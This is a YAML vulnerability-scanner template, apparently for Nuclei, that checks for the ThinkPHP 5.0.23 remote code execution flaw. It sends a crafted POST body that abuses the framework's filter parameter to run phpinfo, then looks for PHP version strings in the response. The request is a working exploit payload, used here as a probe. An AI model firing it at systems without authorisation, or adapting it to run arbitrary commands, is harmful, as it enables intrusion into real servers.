id: tp-523-rce

info:
  name: ThinkPHP 5.0.23 RCE
  author: str1am
  severity: critical
  tags: thinkphp,rce

requests:
  - raw:
      - |
        POST /index.php?s=captcha HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 261
        Connection: close
        Upgrade-Insecure-Requests: 1

        _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
          - "ThinkPHP"
        condition: and

      - type: status
        status:
          - 200